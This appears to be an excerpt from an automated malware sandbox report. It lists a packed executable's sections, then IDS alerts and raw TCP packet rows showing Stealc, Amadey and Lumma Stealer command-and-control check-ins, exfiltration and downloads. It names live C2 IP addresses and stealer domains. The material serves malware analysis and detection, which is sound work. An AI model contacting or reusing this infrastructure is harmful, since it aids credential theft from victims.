.idata	0x24b000	0x1000	0x200	0d0399d83a742d5d86c5718841e8e842	False	0.134765625	data	0.8646718654202081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x24c000	0x2b3000	0x200	494e8c77f3ab5c727fd43c7001cf640b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
oovdzvsf	0x4ff000	0x1aa000	0x1a9600	c02790c6d07194ccfb938cdb3e7d98e1	False	0.9946715214516603	data	7.953224192273572	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lmbmcfaf	0x6a9000	0x1000	0x400	3ad0847b90d3d8bae23c85fa2942220c	False	0.7841796875	data	6.200607861004051	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x6aa000	0x3000	0x2200	6f809e8a325268430eb487bcd9ca04af	False	0.054457720588235295	DOS executable (COM)	0.5662919880931745	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-11T01:14:00.073138+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-11T01:14:00.356248+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-11T01:14:00.362393+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.4	49730	TCP
2024-11-11T01:14:00.639818+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-11T01:14:00.646442+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.4	49730	TCP
2024-11-11T01:14:01.730202+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-11T01:14:02.245750+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-11T01:14:14.675922+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.4	49756	TCP
2024-11-11T01:14:15.136134+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49753	185.215.113.206	80	TCP
2024-11-11T01:14:16.245947+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49753	185.215.113.206	80	TCP
2024-11-11T01:14:16.723298+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49753	185.215.113.206	80	TCP
2024-11-11T01:14:17.170704+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49753	185.215.113.206	80	TCP
2024-11-11T01:14:17.928879+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49753	185.215.113.206	80	TCP
2024-11-11T01:14:18.251484+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49753	185.215.113.206	80	TCP
2024-11-11T01:14:22.213044+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49762	185.215.113.16	80	TCP
2024-11-11T01:14:52.852622+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.4	49763	TCP
2024-11-11T01:15:06.417455+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	49825	185.215.113.43	80	TCP
2024-11-11T01:15:10.060966+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49846	87.236.16.19	80	TCP
2024-11-11T01:15:13.562980+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	49838	TCP
2024-11-11T01:15:14.469285+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	49870	185.215.113.43	80	TCP
2024-11-11T01:15:15.385626+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49876	185.215.113.16	80	TCP
2024-11-11T01:15:38.791158+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.4	56413	1.1.1.1	53	UDP
2024-11-11T01:15:38.817886+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.4	51372	1.1.1.1	53	UDP
2024-11-11T01:15:38.841424+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.4	62738	1.1.1.1	53	UDP
2024-11-11T01:15:38.864888+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.4	64560	1.1.1.1	53	UDP
2024-11-11T01:15:38.889103+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.4	57491	1.1.1.1	53	UDP
2024-11-11T01:15:38.913538+0100	2057121	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)	1	192.168.2.4	63719	1.1.1.1	53	UDP
2024-11-11T01:15:38.937762+0100	2057119	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store)	1	192.168.2.4	63369	1.1.1.1	53	UDP
2024-11-11T01:15:39.597351+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.4	50011	188.114.96.3	443	TCP
2024-11-11T01:15:39.597351+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50011	188.114.96.3	443	TCP
2024-11-11T01:15:40.322851+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50011	188.114.96.3	443	TCP
2024-11-11T01:15:40.322851+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50011	188.114.96.3	443	TCP
2024-11-11T01:15:40.942817+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50015	185.215.113.43	80	TCP
2024-11-11T01:15:40.975986+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.4	50021	188.114.96.3	443	TCP
2024-11-11T01:15:40.975986+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50021	188.114.96.3	443	TCP
2024-11-11T01:15:41.447049+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	50021	188.114.96.3	443	TCP
2024-11-11T01:15:41.447049+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50021	188.114.96.3	443	TCP
2024-11-11T01:15:41.863572+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	50022	185.215.113.16	80	TCP
2024-11-11T01:15:42.219565+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.4	50028	188.114.96.3	443	TCP
2024-11-11T01:15:42.219565+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50028	188.114.96.3	443	TCP
2024-11-11T01:15:44.057271+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.4	50039	188.114.96.3	443	TCP
2024-11-11T01:15:44.057271+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50039	188.114.96.3	443	TCP
2024-11-11T01:15:44.961384+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	50039	188.114.96.3	443	TCP
2024-11-11T01:15:45.882560+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.4	50040	188.114.96.3	443	TCP
2024-11-11T01:15:45.882560+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50040	188.114.96.3	443	TCP
2024-11-11T01:15:47.505855+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.4	50041	188.114.96.3	443	TCP
2024-11-11T01:15:47.505855+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50041	188.114.96.3	443	TCP
2024-11-11T01:15:49.406213+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.4	50043	188.114.96.3	443	TCP
2024-11-11T01:15:49.406213+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50043	188.114.96.3	443	TCP
2024-11-11T01:15:49.765210+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50042	185.215.113.206	80	TCP
2024-11-11T01:15:50.396472+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50044	185.215.113.43	80	TCP
2024-11-11T01:15:51.400667+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.4	64360	1.1.1.1	53	UDP
2024-11-11T01:15:51.425771+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.4	61073	1.1.1.1	53	UDP
2024-11-11T01:15:51.449666+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.4	55775	1.1.1.1	53	UDP
2024-11-11T01:15:51.473263+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.4	62669	1.1.1.1	53	UDP
2024-11-11T01:15:51.517450+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.4	52540	1.1.1.1	53	UDP
2024-11-11T01:15:51.543398+0100	2057121	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)	1	192.168.2.4	57650	1.1.1.1	53	UDP
2024-11-11T01:15:52.171144+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.4	50046	188.114.96.3	443	TCP
2024-11-11T01:15:52.171144+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50046	188.114.96.3	443	TCP
2024-11-11T01:15:52.642458+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50046	188.114.96.3	443	TCP
2024-11-11T01:15:52.642458+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50046	188.114.96.3	443	TCP
2024-11-11T01:15:53.363072+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.4	50047	188.114.96.3	443	TCP
2024-11-11T01:15:53.363072+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50047	188.114.96.3	443	TCP
2024-11-11T01:15:53.834816+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	50047	188.114.96.3	443	TCP
2024-11-11T01:15:53.834816+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50047	188.114.96.3	443	TCP
2024-11-11T01:15:54.158990+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.4	50049	188.114.96.3	443	TCP
2024-11-11T01:15:54.158990+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50049	188.114.96.3	443	TCP
2024-11-11T01:15:54.378335+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50048	185.215.113.43	80	TCP
2024-11-11T01:15:54.589427+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.4	50050	188.114.96.3	443	TCP
2024-11-11T01:15:54.589427+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50050	188.114.96.3	443	TCP
2024-11-11T01:15:54.867149+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50049	188.114.96.3	443	TCP
2024-11-11T01:15:55.295498+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	50051	185.215.113.16	80	TCP
2024-11-11T01:15:55.827242+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.4	50053	188.114.96.3	443	TCP
2024-11-11T01:15:55.827242+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50053	188.114.96.3	443	TCP
2024-11-11T01:15:57.102595+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.4	50054	188.114.96.3	443	TCP
2024-11-11T01:15:57.102595+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50054	188.114.96.3	443	TCP
2024-11-11T01:15:59.943137+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.4	50055	188.114.96.3	443	TCP
2024-11-11T01:15:59.943137+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50055	188.114.96.3	443	TCP
2024-11-11T01:16:00.143098+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.4	51085	1.1.1.1	53	UDP
2024-11-11T01:16:00.181317+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.4	58588	1.1.1.1	53	UDP
2024-11-11T01:16:00.318058+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.4	57240	1.1.1.1	53	UDP
2024-11-11T01:16:00.388247+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.4	58526	1.1.1.1	53	UDP
2024-11-11T01:16:00.423902+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.4	65014	1.1.1.1	53	UDP
2024-11-11T01:16:00.449078+0100	2057121	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)	1	192.168.2.4	52958	1.1.1.1	53	UDP
2024-11-11T01:16:01.100903+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.4	50056	188.114.96.3	443	TCP
2024-11-11T01:16:01.100903+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50056	188.114.96.3	443	TCP
2024-11-11T01:16:01.434055+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.4	50057	188.114.96.3	443	TCP
2024-11-11T01:16:01.434055+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50057	188.114.96.3	443	TCP
2024-11-11T01:16:01.609726+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50056	188.114.96.3	443	TCP
2024-11-11T01:16:01.609726+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50056	188.114.96.3	443	TCP
2024-11-11T01:16:02.286514+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50058	185.215.113.43	80	TCP
2024-11-11T01:16:05.494477+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.4	50059	188.114.96.3	443	TCP
2024-11-11T01:16:05.494477+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50059	188.114.96.3	443	TCP
2024-11-11T01:16:05.749423+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.4	50061	188.114.96.3	443	TCP
2024-11-11T01:16:05.749423+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50061	188.114.96.3	443	TCP
2024-11-11T01:16:05.955584+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50059	188.114.96.3	443	TCP
2024-11-11T01:16:06.228236+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50060	185.215.113.206	80	TCP
2024-11-11T01:16:06.275206+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	50061	188.114.96.3	443	TCP
2024-11-11T01:16:06.275206+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50061	188.114.96.3	443	TCP
2024-11-11T01:16:07.014339+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.4	50063	188.114.96.3	443	TCP
2024-11-11T01:16:07.014339+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50063	188.114.96.3	443	TCP
2024-11-11T01:16:08.421325+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.4	50064	188.114.96.3	443	TCP
2024-11-11T01:16:08.421325+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50064	188.114.96.3	443	TCP
2024-11-11T01:16:09.498244+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50065	185.215.113.206	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 11, 2024 01:13:50.355083942 CET	49675	443	192.168.2.4	173.222.162.32
Nov 11, 2024 01:13:58.867038012 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:13:58.871928930 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:13:58.872009993 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:13:58.872155905 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:13:58.876921892 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:13:59.778992891 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:13:59.779066086 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:13:59.781533003 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:13:59.786915064 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:13:59.964478016 CET	49675	443	192.168.2.4	173.222.162.32
Nov 11, 2024 01:14:00.073045969 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.073137999 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:00.074481010 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:00.079344034 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.356173992 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.356188059 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.356201887 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.356247902 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:00.356281996 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:00.357508898 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:00.362392902 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.639755011 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.639770985 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.639784098 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.639795065 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.639807940 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.639817953 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:00.639821053 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.639832973 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.639843941 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:00.639851093 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.639873028 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:00.639908075 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:00.640305996 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.640352964 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:00.641608953 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:00.646441936 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.922962904 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.923022032 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:00.939419031 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:00.939460993 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:00.944304943 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.944325924 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.944343090 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.944350958 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.944447994 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.944456100 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:00.944475889 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:01.730113983 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:01.730201960 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:01.966722965 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:01.971839905 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.245516062 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.245529890 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.245547056 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.245557070 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.245570898 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.245583057 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.245596886 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.245749950 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.245815992 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.246215105 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.246268034 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.246320963 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.246334076 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.246345997 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.246367931 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.246407032 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.246762037 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.246774912 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.246784925 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.246814966 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.246838093 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.401318073 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.401377916 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.401388884 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.401410103 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.401420116 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.401500940 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.401520014 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.401685953 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.401738882 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.401762962 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.401794910 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.401889086 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.401901960 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.401913881 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.401927948 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.401938915 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.401998997 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.402699947 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.402724028 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.402741909 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.402743101 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.402756929 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.402771950 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.402776957 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.402790070 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.402792931 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.402811050 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.402837992 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.403589010 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.403601885 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.403613091 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.403628111 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.403639078 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.403640032 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.403654099 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.403676033 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.403693914 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.404511929 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.404560089 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.518373966 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.518476009 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.557125092 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.557199001 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:02.557286978 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.557297945 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.557313919 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:02.557326078 CET	80	49730	185.215.113.206	192.168.2.4
